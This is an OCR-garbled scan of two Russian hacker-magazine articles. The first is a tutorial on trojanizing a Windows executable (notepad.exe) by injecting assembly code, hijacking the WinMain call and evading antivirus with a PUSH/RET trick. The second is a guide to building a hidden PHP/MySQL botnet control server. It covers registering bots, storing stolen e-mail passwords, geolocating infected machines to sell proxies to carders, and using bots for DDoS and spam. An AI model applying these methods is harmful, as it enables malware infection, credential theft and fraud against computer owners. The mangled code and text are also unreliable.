Очень часто в файлообмен- 
ных сетях можно встретить 
протрояненные кем-нибудь 
приложения. Прочтение 
этой статье чуть ли не та- 
рантирует тебе, что с дизас- 
семблером или отладчиком 
в руках ты сможешь засечь 
гадкий код в программе и 
избавиться от него. 



На диске к журналу, 
обладая некоторой удачей, 
ты сможешь обнаружить 
все исходные коды, 
описанные в этой статье. 



инень насіи а цгаинииимен- ся Практически 200И незанятых 
пВ’ВА ных сетях можно встретить байт или даже больше! Для ускоре- 
протрояненные кем-нибудь ния загрузки файла большинство 
линкеров выравнивает адрес нача- 
ла первой секции не по РІІе 
АІІдптепІ, а по 8ес4іоп АІІдптепІ, ко- 
торый никак не меньше 10006. Как 
следствие — наши владения увели- 
чиваются до Е006 байт. Для ассемб- 
лерных программ это целый мате- 
рик, на котором и слона разместить 

можно. Ну, если не слона, то полно- 

На диске к журналу, ценную бациллу — точно! В упако- 

ЩввШ обладая некоторой удачей, ванных файлах, заголовок прижат к 

первой секции практически вплот- 
ную, поэтому, перед началом внед- 
рения их необходимо распаковать. 
Отроем поіераб.ехе в редакторе 
НТЕ и будем прокручивать его до тех пор, пока не врежемся в напахан- 
ную целину сплошных нулей. В нашем случае она начинается с адреса 
2Р06 (именно 2Р0И, а не 2ЕР6, поскольку последний нуль служит завер- 
шителем строки ѴѴІМЗРООЕ.ОРІѴ и трогать его нежелательно). Из люб- 
ви к круглым цифрам, выберем 3006, хотя выравнивать начало внедря- 
емого кода совершенно необязательно. 

Теперь необходимо определить базовый адрес загрузки файла. Он содержит- 
ся в заголовке. РІе выходя из РІТЕ, нажмем <Р6> (тосіе) и выберем ре/беасіег. 
Там, в разделе орііопаі беабег: МТ Ііеібз, будет поле ітаде базе. Это и есть ба- 
зовый адрес, в нашем случае равный 1 0000006. Также необходимо убедиться, 
что заголовок действительно распахнут на всю ширину (он лежит в том же раз- 
деле в поле «5І2е о1 беабегз») и в нашем случае равен 6006. Это значит, что 
при загрузке файла в память отображаются только первые 6006 байт от его 
начала, а поскольку мы начинаем внедрение с 3006 байта, размер бациллы не 
может превышать 6006 — 3006 == 3006 байт. Плохо! Очень плохо! Ріо при же- 
лании это поле можно увеличить до 10006. Главное, чтобы оно не превышало 
Зесііоп АІІдптепІ, указанного ниже. Также надо убедиться, что файл не содер- 
жит перемещаемых элементов, которые могут испортить всю малину. Смот- 
рим, если поле базе геіосаііоп Іабіе в разделе орііопаі беабег: бігесіогіез не рав- 
но нулю, лучше всего отказаться от внедрения вообще. При большом желании 
можно внедриться и в перемещаемые файлы, это лишь чуть-чуть труднее, од- 
нако не будем лезть в дебри и для начала разберемся с простым. 
Контрольную сумму (сбескзит) править необязательно. ѴѴІпбо\д/з все равно 
ее игнорирует. Антивирусы, кстати говоря, тоже. Я всегда говорил, что они 
тупые создания! Впрочем, для перестраховки это поле можно обнулить или 
рассчитать новую контрольную сумму с помощью утилиты ебіібіп, постав- 
ляемой о компилятором МісгозоН ѴізиаІ С-и-. 

Также можно внедряться в конец секции кода, в хвосте которой пасется до 
РРРР6 свободных байт, оставленных от выравнивания, однако чаще всего 
их количество не превышает 506, чего для полноценной программы явно 
недостаточно. В общем, будем иметь эту заначку в виду. 

Берем все тот же НТЕ, привычным движением руки давим <Р6> (тобе), 
«ре/беабег» и смотрим атрибуты секции .Іехі (в некоторых случаях она на- 
зывается СОВЕ или как-то еще). Как быстро перейти в конец секции .Іехі? 
Очевидно, необходимо переместиться на начало следующей секции (в на- 
шем случае эта секция .баіа), а затем вернуться на один байт назад. 
Переводим НТЕ в режим страничного имиджа (<Р6>, ре/ітаде), давим <Р5> 
(доіо) и говорим зео1іоп(".ба1а"), заставляя редактора перейти к началу сек- 
ции .баіа. Переводим курсор на несколько строк вверх и... здравствуй, 
хвост секции .Іехі! Нулевые байты (которым соответствует ассемблерная 
команда абб [еах],а1) никем не заняты и могут использоваться по нашему 
усмотрению. В данном случае здесь содержится 386 байт. Хм, не слишком- 
то длинный хвост. Бывают и подлиннее! 

[системные вызовы и библиотечные функции] Бацилла должна 



как-то взаимодействовать о внешним миром: открывать файлы, устанавли- 
вать сетевые соединения, выводить ругательные сообщения и т. д. Обычно 
для этого используется прямой вызов АРІ-функций. Но это не лучший вари- 
ант. Намного удобнее использовать высокоуровневые библиотечные функ- 
ции, доставшиеся бацилле в наследство от дрозофилы. Согласитесь, нам- 
ного удобнее открывать файл с помощью _1ореп, чем СгеаІеРІІе. Одних 
только аргументов в последнем случае потребуется миллион! 
Библиотечные функции легко распознаются при помощи ЮА Рго. И если 
мы запихнем нашу дрозофилу под этот замечательный дизассемблер, то 
мы увидим, что адрес функции _1ореп равен 4019886, значит, ее вызов бу- 
дет выглядеть приблизительно так: 

[пример вызова стандартной библиотечной функции языка Си] 

; аргументы заносятся справа налево 
ризб аВЬ ; "гЬ" указатель на строку с режимом открытия файла 
ризб аNате ; указатель на имя файла 
саІІ 4019886; вызываем функции _1ореп 
абб езр, 8 ; удаляем аргументы из стека 



Однако использовать библиотечные функции можно только после того, как 
отработает Зіагі-Ыр (стартовый код), иначе у нас ничего не получится. В 
этом нам вновь поможет ЮА Рго, распознающая функцию таіп (ѴѴІпМаіп) 
языков С/С-ь-н и паскалевскую процедуру Ведіп. В поіераб'е вызов главной 
функции расположен по адресу 10065716. Здесь находится саІІ 100299Е6, 
где 100299Е6 — адрес ѴѴІпМаіп. Для внедрения дрозофилы, достаточно из- 
менить саІІ 100299Е6 на свой адрес, в смысле адрес бациллы. 

А что делать, если библиотечные функции не распознаны или среди них 
нет той, что нужна нам? Тогда можно обратиться к импорту дрозофилы и 
поискать там. В ЮА Рго это делается так: Ѵіеѵѵ -> Ореп ЗиЬѵіеѵѵ -> Ітрогіз. 
В нашем случае, например, адрес функции МеззадеВохѴѴ равен 010012046. 
На самом деле, это еще не сам адрес, а только указатель на него, инициали- 
зируемый на стадии загрузки, а потому вызов функции будет выглядеть так: 



[пример вызова АРІ-функции из импорта дрозофилы] 



хог еах,еах 
ризб ЗОб 
ризб ІрСарІіоп 
ризб ІрТехІ 
ризб еах 

саІІ бѵѵогб [10012046] 



обнуляем еах 

иТуре 

ІрСарІІоп 

ІрТехІ 

бѴѴпб 



вызываем функции МеззадеВохѴѴ 



Но в некоторых случаях, в импорте искомой функции нет. Что тогда? Есть 
два пути: использовать связку ЕоасіиЬгагу\Ое1РгосАсісІгезз или сканировать 
импорт вручную. Оба этих способа уже рассматривались в статье «Живу- 
чий код: техника написания переносимого збеІІ-кода», опубликованной в 
Спеце, посвященном ошибке переполнения буфера (август 2004 года). 



[память в кредит] Кодовая секция недоступна для записи. Где же дрозо- 
фила будет хранить свои переменные? Проще всего воспользоваться стан- 
дартной Сишной функций таііос или АРІ-функций ѴігІиаІАІІос для выделения 
памяти из кучи. Причем выделенную память можно даже не освобождать — 
при закрытии приложения ѴѴІпсіо\л/з сделает это самостоятельно. 

Еще проще использовать стек. Команда ЗУБ ЕЗР, п — выделяет п байт, а 
АОО ЕЗР, п — возвращает их обратно. Однако типичный объем стека сос- 
тавляет всего несколько мегабайт, а этого количества не всегда достаточ- 
но, так что на практике способы приходится комбинировать. 



[внедрение] Вот мы и подошли вплотную к внедрению. Создадим бациллу, 
выводящую простое диалоговое окно перед запуском дрозофилы. Открыва- 
ем РАН или любой другой редактор и пишем. А что мы, собственно, пишем? 





поиск места для внедрения бациллы в редакторе НТЕ 



основные поля дрозофилы, ответственные за внедрение бациллы 



[хакер 08 [80] 05 > КОДИНГ 121 ] 





[хакер 08 [80] 05 > КОДИНГ 122 ] 



Поскольку это не совсем обычный 
файл, то транслятор должен знать с ка- 
кого адреса начинать ассемблирова- 
ние. Мы решили внедряться в дрозофи- 
лу со смещения ЗООІт, так? Базовый ад- 
рес загрузки равен 10000001т, следова- 
тельно, первый байт бациллы соответ- 
ствует адресу 10003001т. Так и запишем: 

ОРЮ 10003001т. ОРѲ — это директива, 
отвечающая за базирование файла. 

Еще необходимо указать иЗЕ32, что- 
бы РАЗМ знал, что это 32-разрядный 
код. Вот, собственно, и все отличия от 
нормальных файлов. Дальше можно 
кодить как обычно. Ах да, чуть было 
не забыл. Ведь это поіераб.ехе под 
ѴѴІпсІоѵѵз МТ и, следовательно, АЗСІІ- 
функций в нем нет, а импортировать 
их вручную нам лень. Поскольку, 

РАЗМ не поддерживает уникода, пе- 
рекодировку придется осуществлять самостоятельно. В РАРІ'е для этого 
можно набросать следующий макрос: РІІдИІ ' , 0 ," (одинарная кавычка, 

стрелка влево, одинарная кавычка, запятая, ноль, запятая), который будет 
преобразовывать АЗСІІ строки в ПМІСОВЕ. Правда, только на английском 
языке. С русским все очень заморочено. Проще всего взять поіераб.ехе, 
записать в нем строку, сохранить, как уникод, и вставить получившийся 
файл в исходный текст при помощи бЬ. 

Законченный текст программы может выглядеть, например, так: 



лее поздние я не проверял. Зачем 
платить деньги за коммерческий 
НІЕѴѴ, когда есть и бесплатные 
НЕХ-редакторы не хуже!? 

НТЕ все ассемблирует правиль- 
но, но переходить к бацилле по 
перекрестной ссылке наотрез от- 
казывается, считая, что ее нет. 
Нет — и не надо. Нажимаем <Р2> 
(заѵе), чтобы изменения возыме- 
ли силу и выходим по <Р10>. 

С замиранием сердца запускам 
поіерагі.ехе и... Оторвать мыщъх'у 
хвост, это работает! 

[обход антивирусов] И все бы 

было у нас хорошо, если бы анти- 
вирусы ни ругались на инфициро- 
ванный файл. А они ругаются, при- 
чем матом, что портит нам весь 
бизнес и создает угрозу отрыва хвоста и детородного органа вместе с ним. 
Вернемся к адресу 10065711т, в котором происходит передача управления 
на бациллу, и посмотрим, что тут можно предпринять: 

[окрестности точки, в которой происходит перехват управления] 

100656а: саІІ сішгсі ріг [КЕВМЕ132.сІІІ:6еІМосІиІеНапсІІеА] 

1006570: ризй еах 
1006571: саІІІОООЗООй 




перехват управления у ѴѴІпМаіп 



[исходный текст простейшей бациллы, признающийся в любви] 



огд ЮООЗООй 
изе32 
ризйасі 
хог еах, еах 
ризй еах 
рпзй сарііоп 
рпзй Іехі 
рпзй еах 

саІІ ОшгсІ [1001 204(1] 
рораб 

]тр 100299ЕЙ 
геі 



адрес начала бациллы в памяти 
32-разрядный код 
сохраняем все регистры 
ЕАХ := О 

иТуре (диалог с кнопкой ОК) 
указатель на заголовок 
указатель на текст в окне 
ИѴѴпб (нет владельца) 
МеззадеВохѴѴ 
восстанавливаем регистры 
передаем управление ѴѴІпМаіп 
возвращаемся в стартовый код 



сарііоп бЬ 'Іі',0,'е',0,Т,0,Т,0,'о’,0,0,0 

ІехІбЬ Т,0,' ',0,Т,0,'о‘,0,Ѵ,0,'е’,0,' ’,0,У,0,‘о’,0,’и',0,0,0 



Ассемблируем программу РАЗМ'ом и на выходе получаем двоичный файл (для 
определенности пусть это будет !п)ес(.Ып). Запускаем НТЕ, открываем 
поіерагі.ехе и тут же открываем 1п]ес1.Ып (<РЗ> (ореп)). При помощи шифта вы- 
деляем весь код бациллы и ждем <С1г1-1пз> для копирования в буфер обмена. 
Переключаемся на поіераб.ехе (<А!1-2>), находясь в Пех-режиме, подводим 
курсор к смещению ЗООИ и нажимаем <8ПІП-Іпз>, чтобы вставить. Сохраняем 
изменения по <Р2> и... открываем квас (пиво, колу, свежевыжатый персико- 
вый сок — нужное подчеркнуть). Первый этап внедрения завершен. Теперь 
можно послушать Вигпіпд Роіпі, собраться с мыслями и немного расслабиться. 
И вот наступает последний решительный этап: перехват управления у 
ѴѴІпМаіп, точка вызова которой, как мы помним, лежит по адресу 10065711т. 
Переводим НТЕ в дизассемблерный режим (<Р6> (тогіе), ре/ітаде), жмем 
<Р5> (доіо) и говорим: 10065711т. Теперь нажимаем <С1гі-А> (АззептЬіе) и вво- 
дим "САБЕ ІОООЗООІт”, где 10003001т — адрес начала бациллы. Кстати говоря, 
НІЕѴѴ для этой цели непригоден, поскольку неправильно ассемблирует код, и 
все летит к черту. Во всяком случае, версия 6.09 ведет себя именно так, а бо- 



1006576: гпоѵ [еЬр-68Іі], еах 
1006579: ризй еах 

100657а: саІІ бѵѵогб ріг [МЗѴСВТ.бІЕехіІ] 

Очевидно, антивирус отслеживает команду САБЕ, эмулируя ее выполне- 
ние. А как на счет передачи управления через геі? Интересно, сможет ли 
он с ним оправиться? Давай, заменим САБЕ ІОООЗООІт на РПЗН 
1 0ООЗООІт/НЕТ. Это ведь несложно. Правда, возникает одна проблема — 
чистый САБЕ на байт короче и этого самого байта нам как раз не хватает! 
К счастью, следом за САББ'ом расположена команда МОѴ [ЕВР-68ІТ], ЕАХ, 
копирующая код возврата в локальную переменную, а кому он сейчас ну- 
жен? Поэтому мы можем смело оттяпать от нее один байт и перекрыть ос- 
тавшиеся два байта операциями МОР. Как вариант, можно перенести 
часть З1аг1-Б1р кода внутрь бациллы, но в нашем случае это излишне. 
Подводим курсор к 10065716, жмем <С1г1-А> и пишем РБІЗН 
10003006/РІЕТ/МОР/МОР. К сожалению, НТЕ позволяет ассемблировать 
только одну команду за раз, поэтому жать <С1г1-А> приходится многократ- 
но. Еще необходимо в теле бациллы заменить ЦМР 100299Е6/НЕТ на 
САБЕ 100299Е6/ЛѴІР 10065796 (мы ведь заменили САБЕ на эквивалент 
ЦМР'а, поэтому для достижения гармонии необходимо проделать обрат- 
ную ему операцию). 

Сохраняем изменения по <Р2>, выходим и запускаем. Бацилла рабо- 
тает как миленькая, но антивирус уже не ругается. Обиделся, навер- 
ное. Или уснул. 

Вообще, это не самый надежный антиантивирусный прием, зато са- 
мый простой! Остальные можно найти в статье «техника выживания 
в мутной воде или как обуть антивирус», опубликованной в одном из 
номеров Хакера. 

[заключение] Созданная нами бацилла предельно проста и пользы от 
нее немного. Но ведь и вреда никакого! Более сложные программы пишут- 
ся аналогичным способом и каждый из нас сможет справиться с этой зада- 
чей самостоятельно, так что не будем охлаждать творческий стимул и вы- 
давать на гора кучу готовых полуфабрикатов. Твори © 
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Вертикаль власти 

ты, КОНЕЧНО ЖЕ, ЧИТАЛ В НАШЕМ ЖУРНАЛЕ 
СТАТЬИ О СОЗДАНИИ СОБСТВЕННОГО БОТ- 
НЕТА. МУДРЫЕ АВТОРЫ В КОДИНГЕ РАССКА- 
ЗАЛИ ТЕБЕ ВСЮ ПРАВДУ О ТОМ, КАК МОЖНО 
НАПИСАТЬ ЭЛИТНОГО ТРОЯНА, КОТОРОМУ 
НИПОЧЕМ НИ ФАЙРВОЛЫ, НИ КАСПЕРСКИЙ 
СО СВОИМ АНТИВИРУСОМ, НИ ДАЖЕ ОПЫТ- 
НЫЙ И ВНИМАТЕЛЬНЫЙ ПОЛЬЗОВАТЕЛЬ. УШ- 
ЛЫЕ ДЯДЬКИ ВО ВЗЛОМЕ ПОВЕДАЛИ ТЕБЕ, 
КАК МОЖНО ВПАРИТЬ ТАКОГО ТРОЯНА И ЗА- 
РАЗИТЬ ПАРУ ТЫСЯЧ МАШИН. СЕЙЧАС ЖЕ 
ПРИШЛО ВРЕМЯ РАЗОБРАТЬСЯ С ТЕМ, КАК 
НАПИСАТЬ ПРОДВИНУТУЮ СИСТЕМУ ДЛЯ УП- 
РАВЛЕНИЯ БОТАМИ. ВЕДЬ КАКИМИ БЫ УМНЫ- 
МИ И МОЩНЫМИ НЕ БЫЛИ ТВОИ БОЙЦЫ, БЕЗ 
ДОСТОЙНОГО И АВТОРИТЕТНОГО КОМАНДИ- 
РА И СИЛЬНОЙ АРМИИ НЕ ПОЛУЧИТСЯ I ею'о 



Пишем умную систему 
управления ботнетом 

[сопсері] Прежде всего, я объясню, о каких именно ботнетах мы говорим. 
Ты не раз слышал и даже читал в нашем журнале, что боты управляются 
по ІНС — к примеру, в июньском номере Форб писал о беспалевной наст- 
ройке ігссі, а в июле Крис рассказывал, как можно увести ІВС-ботнет. 
Действительно, до недавнего времени существенная часть ботнетов управ- 
лялась по ІВС. Главная причина этому заключается отнюдь не в удобстве 
такого подхода, а в том прискорбном факте, что чуть ли не единственный, 
доступный нахаляву бот АдоЬоІ с его сотнями переделок, использует имен- 
но такую концепцию. 

Устаревшую концепцию, которая естественным образом отмирает, уступая 
дорогу более прогрессивным технологиям. Сейчас после ряда публикаций 
в «кодинге» и «взломе», по идее у тебя не должно быть проблемы соору- 
дить собственного бота, который будет получать команды и управляться 
через НТТР. Концепция здесь следующая. Бот подключается к ѵѵеЬ-серве- 
ру, отправляет элементарный ѲЕТ-запрос на получение определенного 
файла и в качестве ответа получает некоторую команду, которую и начина- 
ет выполнять. На практике оказывается чрезвычайно удобно вместо ста- 
тичного текстового файла о командой использовать программу, написан- 
ную на одном из языков, пригодных для использования в ѵѵеЬ-среде, кото- 
рая будет производить регистрацию ботов и выводить им команды. При 
этом с точки зрения клиентов ситуация ничуть не меняется: все также зап- 
рашивается СЕТ Лііе и получается команда. Боту и невдомек, что на серве- 
ре выполняется специальная программа, которая регистрирует обращение, 
заносит информацию в системный журнал и генерирует приказ. 

[р1и8-р1и8] Какие плюсы у такого подхода? Их много, считай сам: 

ООЛегкость организации. Привести такую систему в состояние готовности, 
если есть рабочий скрипт — дело, самое большое, пяти минут. Тебе не пот- 
ребуется настраивать никакой дополнительный софт, не придется возить- 
ся с настройками, поднять систему можно на любом хосте, где можно вы- 
полнять \л/еЬ-программы. 

[^Стабильность и безопасность. В самом деле, замаскировать такой сер- 
вис — дело элементарное. Скажу тебе по секрету, можно сделать так, что 
снаружи ничего заметить будет просто нереально. 

[ЦБлагодаря сопп-Ьаск концепции, клиенты с «серыми» адресами будут 
также в обойме. Установить на них зоскз-оервер конечно не получится, но 
в качестве ООоЗ-бота заюзать можно. 

[^Возможность индивидуальной работы. Становится реальным, при ис- 
пользовании некоторой идентифицирующей клиентов информации (ір-ад- 
рес, уникальный (іпдегргіпі системы или иной параметр), варьировать вы- 
полняемые команды. К примеру, захваченные машины из США и Европы 
разумно использовать для зоскз-сервиса, в то время, как российские ма- 
шинки использовать для кардинга нельзя, и поэтому из них получатся хо- 
рошие ООоЗ-боты или спам-релеи. Более того, если подключить к своему 





# па нашем диска іы на паи- ботнету несколько мощных серве- 
дешь 100% доделанную, ров на крупных каналах, то разумно 
красивую, вылизанную и для них организовывать собствен- 
ное задание, а не использовать в 
общей мясорубке. 

ЕСбор подробной и качественной 
статистики. Появляется возмож- 
ность сопоставить каждому из мно- 
гих тысяч твоих ботов определен- 
ные свойства: ір-адрес, системные 
параметры, время ріпд'а до хоста, 
географическое положение, сайт, 
где бот заразился и т.д. При этом 
без проблем можно как составлять 
краткие отчеты (общее количество 
ботов, распределение по регионам, 
эффективность той или иной зара- 
жающей площадки, средний, мини- 
мальный и максимальный пинг, ди- 
намика за сутки и т.д. и т.п), так и ге- 
нерировать подробную выборку по 
определенным параметрам. К при- 
меру, при ведении зоскз-бизнеса 
часто бывает необходимо получить 
список хостов, имеющих опреде- 
ленное географическое положение 
(пример — штат Висконсин, США), 

® ири передаче длинных также необходимо вести статистику 

запросов методом 6ЕТ по уже проданным хостам, чтобы не 
мот ВОЗНИКНУТЬ кидать клиентов. 

[б]При использовании ІРІС все чрез- 
вычайно прозрачно: зашел на сер- 
вер, увидел там тысячу ников на од- 
ном канале и сразу все стало понят- 
но. Здесь же управляющая програм- 
ма может легко отличать бота от 
обычного \д/еЬ-клиента (хотя бы по то- 
му критерию, что все браузеры за- 
полняют необязательное поле изег-адепі) и показывать обыкновенному посе- 
тителю что-то весьма миролюбивое, вроде «домашней страницы Петрова Ва- 
ни, студента ДонТу», или и вовсе «403-РогЫбс1еп». Запалить такой сервис сна- 
ружи нереально, однако использовать бесплатный хостинг тоже не советую — 
админ легко заметит ресурс с большой «посещаемостью» и прикроет лавочку, 
да и возможностей для технических маневров, о которых мы поговорим ниже, 
практически нет. Все-таки лучше использовать собственную площадку. 

Ну, сколько плюсов насчитал? Я шесть. Хотя если приглядеться, в каждом 
пункте по пять подпунктов. И этот список можно бесконечно продолжать, в 
результате чего становится все очевидней: управление по ИНр — лучшая 
концепция. Ну, а раз лучшая, будем ее реализовывать. 

[структура системы и принципы работы] Собственно, управляю- 
щая система, которую мы пишем, будет состоять из главного сценария, 
хранилища данных, а также нескольких вспомогательных программ. Что 
касается языка программирования, то мы будем использовать привычный 
РНР, хотя нужно отметить, что при желании все то же самое можно пере- 
писать на любом пригодном для \д/еЬ-среды языке. Управляющая информа- 
ция о ботах, в принципе, может размещаться, где угодно: во внешнем хглі- 
файле, здІИе-базе, или таблицах полновесного сервера БД вроде глуЗОБ. 
Как ты уже догадался, мы будем по привычке использовать последний ва- 
риант. Что касается структуры таблиц, то я буду последовательно их опи- 



На нашем диске ты не най- 
дешь 100% доделанную, 
красивую, вылизанную и 
сверх функциональную 
систему для управления 
ботами. Такая штука стоит 
кучу денег, и, чтобы напи- 
сать ее, нужно немало вре- 
мени :). Поэтому на диске 
ты найдешь скелет систе- 
мы с реализованной ос- 
новной функциональ- 
ностью, но без красивых 
иконок и вылизанного кода. 

На сайте 

шѵт.Ьап1ех.ги/МтІ/шШз_і 
пзіаі.іііт ты найдешь 
шШз-сервис с человечес- 
ким лицом: перловый 
скрипт самостоятельно оп- 
ределяет всю географи- 
ческую информацию о 
хосте и выводит ее в виде 
красочного сообщения с 
флагом страны. 

При передаче длинных 
запросов методом ПЕТ 
могут возникнуть 
серьезные проблемы — 
текст начнет обрубаться и 
передаваться некорректно. 
Следует понимать, что 
большие обьемы данных 
нужно передавать 
РОСТОМ. 





зоскз-оервио у кардеров в ходу 



сывать, рассказывая о различных частях системы, чтобы ты лучше предс- 
тавлял назначение того или иного поля. 

Начнем с самого главного — о регистрации ботов и выдаче команды для 
выполнения. 

Первым делом создадим таблицу Ьоіз, которая имеет следующую структуру: 

[структура таблицы Ьой] 

СВЕАТЕ ТАВЕЕ В0Т8 ( 

Ю ШТ N01 N011 РВІМАВѴ КЕѴ, 

ІР ѴАВСНАВ(15), 

ЕXТЕN^Е^ ѴАВСНАВ(ЗОО) 



Здесь Ю — это уникальный ключ, который генерируется самим ботом при 
установке в системе. При каждом обращении к скрипту бот передает через 
ОЕТ-запрос параметр іб, в котором находится этот идентификатор. Соотве- 
тственно, при каждом обращении сценарий должен проверять, есть ли в 
таблице Ьоіз запись с таким идентификатором и, если нет, добавлять та- 
кую строчку, фактически регистрируя нового бота. Нужно также понимать, 
что тип ІМТ, который я указал в этой таблице для поля Ю, может быть за- 
менен на любой другой, исходя из того, как работает бот: к примеру, если 
генерируемый ключ — это шестнадцатеричное число, или произвольная 
строка, нужно поменять ІМТ на ѴАРЮНАН. 

Идем дальше. В поле ІР записывается адрес внешнего сетевого интерфей- 
са пользователя. Само собой, что если юзер работает через локальную 
сеть с «серой» адресацией, сюда будет записываться внешний ір-адрес его 
шлюза. Помимо переменной іб, бот также может передавать сценарию на- 
бор некоторых свойств пользовательского компьютера: это может быть, к 
примеру, информация о внутренних сетевых интерфейсах, или найденные 
в системе пароли, или информация об используемом железе — что угодно. 
Обрати внимание, что здесь почти нет ограничений на количество и, глав- 
ное, структуру свойств бота. Ведь в разных системах могут налагаться раз- 
личные требования и бот может иметь различные свойства. 

Однако эта свобода наказуема: информация о свойствах бота должна быть 
записана в строгом формате ХМ Б- документа. Я приведу пример такого 
описания, чтобы тебе было понятнее: 

[пример ХМЕ-документа со свойствами бота] 

<ІПІ0> 

<рагат пате="етаіі" зутЬоІіс="Пароли от е-таіГ'> 

Ііо$Еги:Іодіп:сООІра55\л/огО 

</рагат> 

<рагат пате=1гец" $утЬоІіс="Частота процессора"> 

2000 

</рагат> 

<рагапт пате="пеШіоз" 5утЬоIіс="Nе^ЬІ05-имя"> 

зіаііоп 

</рагат> 

<рагат пате="ех1егпа1" зутЬоІіс=”Внешний 1Р“> 

217.10.41.56 

</рагат> 

</іп1о> 

На самом деле, эта фишка о ХМБ была придумана, чтобы обеспечить уни- 
версальность и расширяемость системе. Ведь для разных ботов набор 
свойств может быть различным, и если бы я тупо в таблице сделал статич- 
ное число постоянных полей, то переделка такой системы заключалась бы 
в полной перестройке таблицы и скриптов. А в нашем случае ничего пере- 
делывать не нужно, нужно лишь соблюдать установленный 
формат записываемых данных и обеспечить одинаковую 
структуру информации для всех ботов. При этом особо следу- 
ет отметить, что система автоматически позволит произво- 
дить сортировку и поиск по содержимому каждого элемента 
<рагат>, для расшифровки данных (фактически, для подписи 
колонок таблицы) будет использоваться содержимое свойства 
зуглЬоІіс, а параметр пате будет использован внутри сцена- 
рия при выборке информации. 

Вообще говоря, такие вещи, как, например, пароли от различ- 
ных сервисов — это данные, которые сами по себе имеют не- 
которую структуру: они состоят из логина, пароля и, собствен- 
но, узла аутентификации. Соответственно, по большому сче- 
ту, для каждого такого типа нужно было создавать отдельную 
структуру с разделенными полями, однако я предпочел для 
универсальности привести эти данные к атомарному виду, 
разделив поля символом двоеточия и склеив их в строку. 
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[учет ботов] Но, довольно лирики, пе- 
рейдем к программированию :). Давай для 
затравки напишем функцию, которая бу- 
дет производить регистрацию нового бота 
в системе. В общем-то, тут все предельно 
ясно и сводится к составлению несложного 
зді-запроса: 

[функция регистрации нового бота 
в системе] 

Іипсііоп ВедВоІ($ісІ,$ір,&$ех1еп(1) { 
$ге=тузцІ_циегу("іпзегІ іпЮ Ьоіз 
ѵаІие5('$і(і', '$ір', '$ех(епсІ')”); 
геІигп($ге); 

) 

Вызов этой функции осуществляется при ус- 
ловии, что содержимое всех переменных 
корректное (ігі — число, ір — адрес Ірѵ4, 
ехіапсі — корректный хті-документ). Напи- 
сать такую проверку — дело несложное, при- 
водить код я здесь не буду, лучше подсмот- 
ри его на нашем диске (функция сГіескГуре). 

[команды] Теперь о том, каким образом 
ботам будут выдаваться команды. Как я 
уже говорил, наша система будет поддер- 
живать, что называется, индивидуальный 
подход: работничков можно будет органи- 
зовывать в группы и каждой группе назна- 
чать свое задание. Причем создание групп 
может осуществляться как при помощи яв- 
ного перечисления входящих туда ботов, 
так и при помощи некоторого фильтра. 
Для дальнейшего изложения потребуется 
еще одна таблица: 



[таблица ѵѵгк_дгр] 

СРЕАТЕ ТАВЕЕ ѴѴРіК_0РР( 

В0Т_Ю INТ N01 N011 А^Т0^NСР!ЕМЕNТ РРІМАРІѴ КЕѴ, 

ѴѴ_Ю INТ N01 N011); 

Эта таблица будет разбивать множество ботов на так называемые «коман- 
ды», для каждой из которых можно будет организовывать собственное за- 
дание. Добавление бота в команду по идентификатору — дело плевое, сво- 
дится к простому составлению запроса. Куда интереснее выглядит форми- 
рование списка команды по фильтру, среди параметров которого просто 
обязаны быть такие поля, как «страна», «штат», «город» и т.д. Здесь мы 
сталкиваемся с проблемой классификации ботов по географическому 
признаку и чуть позже я расскажу тебе, как такая проблема решается. 

Что касается выдачи задания, то это реализуется чрезвычайно просто. 



Создается еще одна таблица с «заданиями», 
куда вбиваются пары «идентификатор_груп- 
пы» — «выполняемая команда». Когда бот об- 
ращается к скрипту, сценарий смотрит, в ка- 
кой группе работает зомби, делая ЗЕСЕСТ 
ѴѴ_Ю РВОМ \Л/НК_ОВР ѴѴНЕВЕ ВОТ_Ю=$1б. 
Затем аналогичным запросом из таблицы о за- 
даниями выбирается команда для этого бота и 
помещается в стандартный поток вывода. Те- 
перь расскажу о том, как можно определить 
географическое положение бота. 

[урок географии] Как ты уже понял, при до- 
бавлении в таблицу Ьоіз информации о новом 
боте, записывается и ір-адрес хоста. Напраши- 
вается вопрос: а можно ли, и, если можно, то с 
какой точностью, определить местоположение 
клиента? 

Было бы весьма кстати научиться это делать, 
ведь любому Кардеру очень нужны локализо- 
ванные соксы, чтобы правдоподобно имитиро- 
вать транзакции владельцев кредитных карт. 
Если клиент не использует ѵрп-туннелей и про- 
чей анонимной бодяги, то по его родному адре- 
су можно указать на географическое располо- 
жение. Сделать это совсем несложно, вбив ай- 
пишник в соответствующую форму на 
ѵ\/\А/\л/.піс.ги/\л/Іюіз. Однако сам понимаешь, что 
осуществлять руками поиск для каждого из ты- 
сяч ботов — занятие мало совместимое с психи- 
ческим здоровьем. Поэтому, разумеется, мы на- 
учимся определять расположение клиента авто- 
матически, при помощи специального скрипта. 
Вообще говоря, наша задача на ближайшие 20 
минут заключается в следующем. Нужно напи- 
сать функцию, которая по передаваемому ей 
ір-адресу извлекала бы максимум информа- 
ции о географическом расположении этой точ- 
ки. Сделать это можно несколькими способа- 
ми: использовать сетевые функции для работы о ѵѵітоіз-сервисом, исполь- 
зовать один из ѵѵеЬ-гейтов, или вовсе — заюзать стандартную юниксовую 
программу ѴѴІ10ІЗ. На самом деле, это совершенно неважно, каким образом 
получать данные из ѵѵИоіз, поэтому я, чтобы не нагромождать кода, буду ис- 
пользовать стандартную утилиту тітоіз из поставки ипіх. Вообще, концеп- 
ция здесь следующая. Получается полный ѵѵИоіз-ответ по конкретному ад- 
ресу и затем из него выбираются необходимые поля: Соипігу, Сііу, 
ВІаІеРгоѵ, РозІаІСобе, МеІВапде, аббгезз. Для записи и хранения этой ин- 
формации нам потребуется еще одна таблица, которую я назвал Іосаііопз: 

[структура таблицы Іосаііопз] 

СВЕАТЕ ТАВЕЕ Е0САТI0N8( 

ЕРІОМ.ІР ШТ N01 N^ЕЕ РВІМАРУ КЕУ, 




I ЗАЩИЩАЕМ СВОЙ БОТНЕТ I 

Фактически защита ботнета сводится к защите твоего серве- 
ра. Именно по этой причине не рекомендуется держать ботов 
на халявных хостингах, читать новостные ленты и проявлять 
профессионализм при администрировании сервера. 

Теперь расскажу о том, как можно замаскировать ботнет, что- 
бы его не было видно снаружи. Давай подумаем, как твой 
сервис могут запалить. Ну, скажем, какой-то крутой пользо- 
ватель все-таки заметил работу вируса и разгадал, к какому 
узлу он подключается. Естественно, что он тут же наберет в 
адресной строке ЕІВЕ управляющего скрипта и будет ожидать 
там ріаіпіехі-команду. Но не тут-то было! 

